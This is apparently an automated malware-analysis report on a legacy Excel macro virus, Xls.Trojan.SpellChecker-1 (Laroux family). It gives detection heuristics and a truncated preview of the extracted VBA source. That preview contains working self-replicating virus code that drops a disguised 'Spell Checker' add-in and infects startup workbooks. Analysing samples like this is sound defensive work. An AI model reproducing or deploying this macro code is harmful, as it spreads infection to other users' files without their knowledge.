MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as a malicious Excel macro virus, specifically 'Xls.Trojan.SpellChecker-1', by ClamAV. It contains VBA macros with Auto_Open and Auto_Close functions designed to infect other workbooks. The script attempts to spread by looking for other workbooks and scheduling infection routines, indicating a self-propagating malicious document.
Heuristics 6
-
ClamAV: Xls.Trojan.SpellChecker-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.SpellChecker-1
-
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUSLegacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17935 bytes |
SHA-256: ce1b776896b42d5bb231dbc7db251220633cc7782e68e44012f1963aabf8e5b3 |
|||
|
Detection
ClamAV:
Xls.Trojan.SpellChecker-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MSExcel"
' Date Virus.
' Created: May 1, 1996.
'
' NOTE:
' The Date Virus was inspired by the Laroux virus. While this particular
' macro virus is harmless, others are not! This macro virus was developed
' to bring attention to the possible threat in the hopes that antivirus software
' will be developed to protect this application.
Public NextSchedule
Public Running
Function HasAddIn() As Boolean
Attribute HasAddIn.VB_ProcData.VB_Invoke_Func = " \n14"
HasAddIn = False
For Each prog In AddIns
If prog.Name = "SPELLCK.XLA" Then HasAddIn = True: Exit For
Next
End Function
Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
If (ThisWorkbook.Name = "SPELLCK.XLA") Then Exit Sub
If Running = False Then Exit Sub
For Each book In Workbooks
If book.Name <> ThisWorkbook.Name Then
For Each modul In book.Modules
If modul.Name = "MSExcel" Then
Application.OnTime Now, book.Name & "!MSExcel.RepeatInfect"
End If
Next
End If
Next
Application.OnTime NextSchedule, ThisWorkbook.Name & "!MSExcel.RepeatInfect", , False
Application.DisplayAlerts = False
ThisWorkbook.Close
End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim fname As String
Dim WB, WS As String
If (ThisWorkbook.Name = "SPELLCK.XLA") Then Payload
Counter = 0: AppInfected = False: WB = WS = ""
On Error Resume Next
WS = ActiveSheet.Name
WB = ActiveWorkbook.Name
On Error GoTo GotError
' don't want to leave the Mac users out of the fun!
If (Left(Application.OperatingSystem, 3) = "Mac") Then
fname = CurDir() & Application.PathSeperator & "SPELLCK.XLA"
Else
fname = "C:\SPELLCK.XLA"
End If
If (Dir(fname) = "") Then
ThisWorkbook.Activate
ThisWorkbook.Title = "Spell Checker"
addinfname = "VBA.MAKE.ADDIN(""" & fname & """)"
ExecuteExcel4Macro addinfname
On Error Resume Next
Workbooks(WB).Activate
Worksheets(WS).Activate
On Error GoTo GotError
End If
If HasAddIn = True Then
If (AddIns("Spell Checker").Installed = False) Then AddIns("Spell Checker").Installed = True
Else
AddIns.Add(fname, False).Installed = True
End If
For Each book In Workbooks
If book.Name <> ThisWorkbook.Name Then
For Each modul In book.Modules
If modul.Name = "MSExcel" Then
Running = False
Exit Sub
End If
Next
End If
Next
' attempt to infect the user's startup files.
If (Left(Application.OperatingSystem, 3) = "Mac") Then
StartFile = Dir(Application.StartupPath, MacID("XCEL"))
Else
StartFile = Dir(Application.StartupPath & Application.PathSeparator & "*.XLS")
End If
If ((StartFile <> "") And (StartFile <> ThisWorkbook.Name)) Then
On Error Resume Next
Workbooks.Open(Application.StartupPath & Application.PathSeparator & StartFile).Activate
Infect
ActiveWorkbook.Save
ActiveWorkbook.Close
Workbooks(WB).Activate
Worksheets(WS).Activate
On Error GoTo GotError
End If
If (Left(Application.OperatingSystem, 3) = "Mac") Then
StartFile = Dir(Application.AltStartupPath, MacID("XCEL"))
Else
StartFile = Dir(Application.AltStartupPath & Application.PathSeparator & "*.XLS")
End If
If ((StartFile <> "") And (StartFile <> ThisWorkbook.Name)) Then
On Error Resume Next
Workbooks.Open(Application.AltStartupPath & Application.PathSeparator & StartFile).Activate
Infect
ActiveWorkbook.Save
ActiveWorkbook.Close
Workbooks(WB).Activate
Worksheets(WS).Activate
On Error GoTo GotError
End If
GotError:
RepeatInfect
End Sub
Function RepeatInfect()
Attribute R
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.